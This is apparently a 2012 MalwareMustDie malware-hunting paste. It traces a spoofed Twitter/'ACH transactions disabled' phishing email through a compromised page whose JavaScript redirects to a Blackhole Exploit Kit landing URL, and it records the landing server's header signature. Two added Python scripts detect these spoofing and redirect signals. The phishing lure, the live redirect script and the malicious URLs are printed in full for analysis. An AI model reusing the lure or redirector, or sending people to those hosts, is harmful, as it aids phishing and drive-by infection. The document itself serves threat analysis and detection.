- =====================================
- #MalwareMustDie - A quest
- Spam to BHEK to ...
- =====================================
- // Following "Twitter-Security-looks" Spams:
- // hint & follow by Ken Pryor
- // Spam in orig format(txt)
- Delivered-To: xxxxx@xxxxx.com
- Received: by 10.216.95.198 with SMTP id p48csp285246wef;
- Wed, 26 Dec 2012 06:58:12 -0800 (PST)
- X-Received: by 10.182.36.8 with SMTP id m8mr22507914obj.93.1356533891842;
- Wed, 26 Dec 2012 06:58:11 -0800 (PST)
- Return-Path: <JuniorGastelum@schmitt-title.com>
- Received: from ????-?? ([92.46.240.84])
- by mx.google.com with ESMTP id y4si7207599obv.81.2012.12.26.06.58.08;
- Wed, 26 Dec 2012 06:58:11 -0800 (PST)
- Received-SPF: softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) client-ip=92.46.240.84;
- Authentication-Results: mx.google.com; spf=softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) smtp.mail=JuniorGastelum@schmitt-title.com
- Received: from ham-cannon.twitter.com ([199.59.148.236]) by schmitt-title.com;
- Wed, 26 Dec 2012 03:58:10 +0600
- Date: Wed, 26 Dec 2012 03:58:10 +0600
- From: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
- Reply-To: noreply@postmaster.twitter.com
- To: xxxxx@xxxxx.com
- Message-Id: <1KC8PY8L49UMD_TPA1QU8PAABSYQ9C03@522357004.twitter.com.tmail>
- Subject: Re: Banking security update.
- Mime-Version: 1.0
- Content-Type: multipart/alternative; boundary=mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
- X-Campaignid: twitter51056991109478
- X-Twitterimpressionid: am-57174748899437484147607592
- Errors-To: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
- Bounces-To: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
- Return-Path: c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com
- X-OriginalArrivalTime: Wed, 26 Dec 2012 03:58:10 +0600 FILETIME=[726C4133:38072607]
- --mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
- Content-Type: text/plain; charset=UTF-8
- Content-Transfer-Encoding: 7bit
- Dear Online Account Operator,
- Your ACH transactions have been
- temporarily disabled.
- View details
- Best regards,
- Security department
- --mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
- Content-Type: text/html; charset=UTF-8
- Content-Transfer-Encoding: 7bit
- <html>
- <body >
- Dear Online Account Operator, <br><br>
- Your ACH transactions have been <br>
- temporarily disabled. <br>
- <a href="http://www.bibliotekarz.pl/sites/all/themes/mail2.htm">View details </a><br><br>
- Best regards,<br>
- Security department<br><br><br><br><br>
- </body>
- </html>
- --mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51--
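Added example (not part of the original paste or MalwareMustDie's tooling): a small triage script that reads the spoofing indicators visible in the headers above, namely the MTA's SPF softfail, the "Twitter" From domain that disagrees with the envelope sender in Return-Path, and a body link pointing off the claimed sender's domain. The sample message is a constructed, trimmed copy of the spam; `base_domain` is a deliberate two-label simplification with no public-suffix list.

```python
import re
from email import message_from_string, policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample: the relevant headers and HTML part of the spam above, trimmed.
SAMPLE = """\
Return-Path: <JuniorGastelum@schmitt-title.com>
Received-SPF: softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) client-ip=92.46.240.84;
From: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
Reply-To: noreply@postmaster.twitter.com
Subject: Re: Banking security update.
Content-Type: text/html; charset=UTF-8

<html><body>Your ACH transactions have been temporarily disabled.<br>
<a href="http://www.bibliotekarz.pl/sites/all/themes/mail2.htm">View details</a></body></html>
"""


def base_domain(host):
    # Simplification: keep the last two labels, no public-suffix list.
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def triage(raw):
    """Return a list of findings; an empty list means no indicator fired."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []
    # 1. The receiving MTA's verdict: fail/softfail means the connecting IP is
    #    not an authorised sender for the envelope-sender domain.
    spf = str(msg.get("Received-SPF", "")).split(None, 1)
    if spf and spf[0].lower() in ("fail", "softfail"):
        findings.append(f"spf:{spf[0].lower()}")
    # 2. Displayed From domain vs the envelope sender recorded in Return-Path
    #    (the first Return-Path is the one our own MTA prepended).
    from_dom = base_domain(parseaddr(str(msg["From"]))[1].rsplit("@", 1)[-1])
    env_dom = base_domain(parseaddr(str(msg["Return-Path"]))[1].rsplit("@", 1)[-1])
    if from_dom != env_dom:
        findings.append(f"from-mismatch:{from_dom}!={env_dom}")
    # 3. Links in the HTML part that lead outside the claimed sender's domain.
    body = msg.get_body(preferencelist=("html",))
    html = body.get_content() if body else ""
    for url in re.findall(r'href="([^"]+)"', html):
        host = urlparse(url).hostname or ""
        if base_domain(host) != from_dom:
            findings.append(f"offdomain-link:{host}")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```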
- // fetch the stuff..tips: use the email domain source as referer
- --2012-12-27 02:24:45-- http://www.bibliotekarz.pl/sites/all/themes/mail2.htm
- Resolving www.bibliotekarz.pl (www.bibliotekarz.pl)... 194.181.21.145
- Caching www.bibliotekarz.pl => 194.181.21.145
- Connecting to www.bibliotekarz.pl (www.bibliotekarz.pl)|194.181.21.145|:80... connected.
- Created socket 3.
- Releasing 0x28804160 (new refcount 1).
- ---request begin---
- GET /sites/all/themes/mail2.htm HTTP/1.1
- Referer: http://twitter.com
- User-Agent: MalwareMustDie is painting red X-mark on your door!
- Accept: */*
- Host: www.bibliotekarz.pl
- Connection: Keep-Alive
- ---request end---
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Date: Wed, 26 Dec 2012 16:16:06 GMT
- Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 PHP/5.2.14
- Last-Modified: Wed, 26 Dec 2012 16:07:02 GMT
- ETag: "250ef8-1a7-4d1c39eecf580"
- Accept-Ranges: bytes
- Content-Length: 423
- Cache-Control: max-age=1209600
- Expires: Wed, 09 Jan 2013 16:16:06 GMT
- Keep-Alive: timeout=5, max=100
- Connection: Keep-Alive
- Content-Type: text/html
- ---response end---
- 200 OK
- Saving to: `mail2.htm'
- 2012-12-27 02:24:47 (8.08 MB/s) - `mail2.htm' saved [423/423]
- // See the inside....
- @unixfreaxjp /malware]$ cat mail2.htm
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- <title>Please wait</title>
- </head>
- <body>
- <h1><b>Please wait a moment ... You will be forwarded... </h1></b>
- <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
- <script>
- var1=49;
- var2=var1;
- if(var1==var2) {document.location="http://bunakaranka.ru:8080/forum/links/column.php";}
- </script>
- </body>
- // LANDING PAGE:
- http://bunakaranka.ru:8080/forum/links/column.php
- // Blackhole PoC:
- Resolving bunakaranka.ru (bunakaranka.ru)... 210.71.250.131, 187.85.160.106, 91.224.135.20
- Caching bunakaranka.ru => 210.71.250.131 187.85.160.106 91.224.135.20
- Connecting to bunakaranka.ru (bunakaranka.ru)|210.71.250.131|:8080... connected.
- // This pattern/signature:
- Server: nginx/1.0.10
- Date: Wed, 26 Dec 2012 17:30:46 GMT
- Content-Type: text/html; charset=CP-1251
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- // You know the drill from here, just follow guidance posts in malwaremustdie.blogspot.com !
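Added example (not from the original paste): a checker that pulls the `document.location` target out of the trivial `mail2.htm` redirector above and scores the landing page's URL and response headers against the signals shown in the PoC (port 8080, the three-segment `.php` path, nginx 1.0.x, the dotdeb PHP build, the CP-1251 charset). The redirector and header samples are constructed copies of the page's text; treating each signal as one weak hit to be scored together is an assumption of this example, not a published rule.

```python
import re
from urllib.parse import urlparse

# Constructed samples reproducing the redirector and landing-page headers shown above.
REDIRECTOR = """<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="http://bunakaranka.ru:8080/forum/links/column.php";}
</script>"""

LANDING_HEADERS = """Server: nginx/1.0.10
Date: Wed, 26 Dec 2012 17:30:46 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0"""

# Assumed generalisation of the single /forum/links/column.php path seen above.
THREE_LEVEL_PHP = re.compile(r"^/[a-z]+/[a-z]+/[a-z]+\.php$")


def redirect_target(html):
    """Return the URL a bare document.location redirector sends the browser to."""
    m = re.search(r'document\.location\s*=\s*["\']([^"\']+)["\']', html)
    return m.group(1) if m else None


def score_landing(url, raw_headers):
    """Return the list of PoC signals that match; more hits, more suspicion."""
    hdrs = {}
    for line in raw_headers.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            hdrs[key.strip().lower()] = value.strip()
    u = urlparse(url)
    hits = []
    if u.port == 8080:
        hits.append("port-8080")
    if THREE_LEVEL_PHP.match(u.path):
        hits.append("3-level-php-path")
    if hdrs.get("server", "").startswith("nginx/1.0."):
        hits.append("nginx-1.0.x")
    if "dotdeb" in hdrs.get("x-powered-by", "").lower():
        hits.append("php-dotdeb")
    if "cp-1251" in hdrs.get("content-type", "").lower():
        hits.append("charset-cp1251")
    return hits


if __name__ == "__main__":
    target = redirect_target(REDIRECTOR)
    print(target, score_landing(target, LANDING_HEADERS))
```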
- ---
- MalwareMustDie - Dec 26th 2012